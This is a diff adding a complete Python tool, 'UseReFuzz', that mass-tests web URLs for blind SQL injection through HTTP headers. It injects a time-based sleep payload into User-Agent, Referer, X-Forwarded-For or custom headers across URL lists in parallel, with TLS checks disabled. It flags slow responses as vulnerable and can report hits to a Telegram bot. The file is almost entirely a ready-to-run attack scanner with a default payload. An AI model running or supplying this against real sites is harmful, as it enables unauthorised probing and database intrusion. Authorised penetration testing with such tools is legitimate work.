| 1 | + | #!/usr/bin/env python3 |
| 2 | + | # Author = Tanishq Rathore (Kun) |
| 3 | + | # V = 2.0.0 |
| 4 | + | |
| 5 | + | import requests |
| 6 | + | import argparse |
| 7 | + | import urllib3 |
| 8 | + | import multiprocessing as mp |
| 9 | + | import sys |
| 10 | + | import os |
| 11 | + | import datetime |
| 12 | + | import configparser |
| 13 | + | |
| 14 | + | # Disable warning regarding ssl |
| 15 | + | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
| 16 | + | |
| 17 | + | # Colour Checking |
| 18 | + | if os.name != 'nt': |
| 19 | + | class bcolors: |
| 20 | + | HEADER = '\033[95m' |
| 21 | + | OKBLUE = '\033[94m' |
| 22 | + | OKCYAN = '\033[96m' |
| 23 | + | OKGREEN = '\033[92m' |
| 24 | + | WARNING = '\033[93m' |
| 25 | + | FAIL = '\033[91m' |
| 26 | + | ENDC = '\033[0m' |
| 27 | + | BOLD = '\033[1m' |
| 28 | + | UNDERLINE = '\033[4m' |
| 29 | + | SLANT = '\x1B[3m' |
| 30 | + | else: |
| 31 | + | class bcolors: |
| 32 | + | HEADER = '' |
| 33 | + | OKBLUE = '' |
| 34 | + | OKCYAN = '' |
| 35 | + | OKGREEN = '' |
| 36 | + | WARNING = '' |
| 37 | + | FAIL = '' |
| 38 | + | ENDC = '' |
| 39 | + | BOLD = '' |
| 40 | + | UNDERLINE = '' |
| 41 | + | SLANT = '' |
| 42 | + | print("USEREFUZZ | Colouring is disable as Windows OS is detected") |
| 43 | + | |
| 44 | + | |
| 45 | + | # Banner |
| 46 | + | banner=f""" |
| 47 | + | {bcolors.FAIL} ( ( |
| 48 | + | {bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ ) |
| 49 | + | ( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}( |
| 50 | + | )\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} ( |
| 51 | + | _ ((_))\ /{bcolors.FAIL}((_|_)) /{bcolors.WARNING}((_|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE} |
| 52 | + | | | | ((_|_)) | _ (_)) | |_(_))(((_|(_) |
| 53 | + | | |_| (_-< -_)| / -_)| __| || |_ /_ / |
| 54 | + | \___//__|___||_|_\___||_| \_,_/__/__| {bcolors.SLANT}{bcolors.UNDERLINE}V 2.0.0{bcolors.ENDC} |
| 55 | + | |
| 56 | + | {bcolors.OKBLUE} |
| 57 | + | [ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC} |
| 58 | + | """ |
| 59 | + | |
| 60 | + | print(banner) |
| 61 | + | |
| 62 | + | # Arguments |
| 63 | + | parser = argparse.ArgumentParser() |
| 64 | + | parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST") |
| 65 | + | parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY") |
| 66 | + | parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header") |
| 67 | + | parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10) |
| 68 | + | parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False) |
| 69 | + | parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False) |
| 70 | + | parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT") |
| 71 | + | parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL') |
| 72 | + | parser.add_argument('-ch','--customerheader', type=str,help=f'🔒_Custom Header for SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -ch X-Auth {bcolors.ENDC}', default="NO_CUSTOM_HEADER") |
| 73 | + | parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5) |
| 74 | + | parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'"{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"') |
| 75 | + | args = parser.parse_args() |
| 76 | + | |
| 77 | + | if args.telify: |
| 78 | + | try: |
| 79 | + | config = configparser.ConfigParser() |
| 80 | + | config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini')) |
| 81 | + | CHAT_ID = config['TELIFY']['CHATID'] |
| 82 | + | API_TOKEN = config['TELIFY']['APITOKEN'] |
| 83 | + | telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage' |
| 84 | + | requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'}) |
| 85 | + | except: |
| 86 | + | print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}") |
| 87 | + | |
| 88 | + | if args.output != "NO_OUTPUT": |
| 89 | + | print(f'{bcolors.BOLD} 📂 Logging Output of Vulnerable URLs to => {args.output}.md \n') |
| 90 | + | file = open(args.output + ".md","w") |
| 91 | + | file.write(f""" |
| 92 | + | # UseReFuzz HEADER SQLI INJECTION REPORT |
| 93 | + | |
| 94 | + | ## Author - Tanishq Rathore (Kun) |
| 95 | + | ## Github - https://github.com/root-tanishq/userefuzz |
| 96 | + | ## Twitter - https://twitter.com/root_tanishq |
| 97 | + | |
| 98 | + | > UseReFuzz runned on `{datetime.datetime.now()}` |
| 99 | + | |
| 100 | + | ## Legality |
| 101 | + | |
| 102 | + | ``` |
| 103 | + | Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program |
| 104 | + | ``` |
| 105 | + | |
| 106 | + | - Payload Used `{args.inject}` |
| 107 | + | |
| 108 | + | - Sleep used for checking `{args.sleep}` |
| 109 | + | |
| 110 | + | # Report Results |
| 111 | + | | TIME TAKEN | URL | IS VULNERABLE | |
| 112 | + | | --- | --- | --- | |
| 113 | + | """) |
| 114 | + | file.close() |
| 115 | + | fileappend = open(args.output + ".md" , "a") |
| 116 | + | |
| 117 | + | def header_injector(url): |
| 118 | + | if args.customerheader != 'NO_CUSTOM_HEADER': |
| 119 | + | header = { args.customerheader : args.inject , 'UseReFuzz':args.message } |
| 120 | + | else: |
| 121 | + | header = {'User-Agent':args.inject , 'Referer': args.inject , 'X-Forwarded-For':args.inject , 'UseReFuzz':args.message } |
| 122 | + | proxy = { 'http': args.proxy , 'https': args.proxy } |
| 123 | + | sess = requests.Session() |
| 124 | + | resp = sess.get(url , headers=header , verify=False) |
| 125 | + | resp_time = resp.elapsed.total_seconds() |
| 126 | + | try: |
| 127 | + | if resp_time >= args.sleep-1: |
| 128 | + | if args.proxy != 'NO_PROXY': |
| 129 | + | try: |
| 130 | + | sess.get(url , headers=header , verify=False , proxies=proxy , timeout=0.000000000001) |
| 131 | + | except: |
| 132 | + | pass |
| 133 | + | print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉P{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url) |
| 134 | + | else: |
| 135 | + | print(f'{bcolors.OKGREEN}{bcolors.BOLD}[💉💉{bcolors.ENDC}{bcolors.OKGREEN}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.OKGREEN} ] URL => {bcolors.ENDC}', url) |
| 136 | + | if args.output != "NO_OUTPUT": |
| 137 | + | fileappend.write(f'| {resp_time} | "{url}" | 💉True |\n') |
| 138 | + | fileappend.flush() |
| 139 | + | if args.telify: |
| 140 | + | telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage' |
| 141 | + | requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💎] (USEREFUZZ)⛓️URL(💻)⛓️ {url} ⛓️RESPONSE TIME(⏲️)⛓️ {resp_time}'}) |
| 142 | + | else: |
| 143 | + | if args.verbose: |
| 144 | + | print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url) |
| 145 | + | if args.output != "NO_OUTPUT": |
| 146 | + | fileappend.write(f'| {resp_time} | "{url}" | False |\n') |
| 147 | + | fileappend.flush() |
| 148 | + | except: |
| 149 | + | if args.verbose: |
| 150 | + | print(f'{bcolors.FAIL}{bcolors.BOLD}[{bcolors.ENDC}NV{bcolors.ENDC}{bcolors.FAIL}{bcolors.BOLD}] \t[ {bcolors.ENDC}{str(resp_time)[:4]}{bcolors.BOLD}{bcolors.FAIL} ] URL => {bcolors.ENDC}', url) |
| 151 | + | if args.output != "NO_OUTPUT": |
| 152 | + | fileappend.write(f'| {resp_time} | "{url}" | False |\n') |
| 153 | + | fileappend.flush() |
| 154 | + | |
| 155 | + | |
| 156 | + | def main(): |
| 157 | + | if args.url != "NO_URL": |
| 158 | + | header_injector(args.url) |
| 159 | + | elif args.list != "NO_LIST": |
| 160 | + | try: |
| 161 | + | urllist = filter(None , open(args.list,'r').read().split("\n")) |
| 162 | + | with mp.Pool(args.workers) as worker: |
| 163 | + | worker.map(header_injector , urllist) |
| 164 | + | except KeyboardInterrupt: |
| 165 | + | exit(0) |
| 166 | + | except: |
| 167 | + | if os.path.isfile(args.list): |
| 168 | + | exit(0) |
| 169 | + | else: |
| 170 | + | print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}') |
| 171 | + | elif not sys.stdin.isatty(): |
| 172 | + | try: |
| 173 | + | urlfile = [] |
| 174 | + | for line in sys.stdin: |
| 175 | + | try: |
| 176 | + | urlfile.append(line.split()[0]) |
| 177 | + | except: |
| 178 | + | pass |
| 179 | + | with mp.Pool(args.workers) as worker: |
| 180 | + | worker.map(header_injector , urlfile) |
| 181 | + | except KeyboardInterrupt: |
| 182 | + | exit(0) |
| 183 | + | except: |
| 184 | + | exit(0) |
| 185 | + | else: |
| 186 | + | print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# {sys.argv[0]} --help {bcolors.ENDC}") |
| 187 | + | if args.output != "NO_OUTPUT": |
| 188 | + | fileappend.close() |
| 189 | + | |
| 190 | + | |
| 191 | + | main() |
| 192 | + | |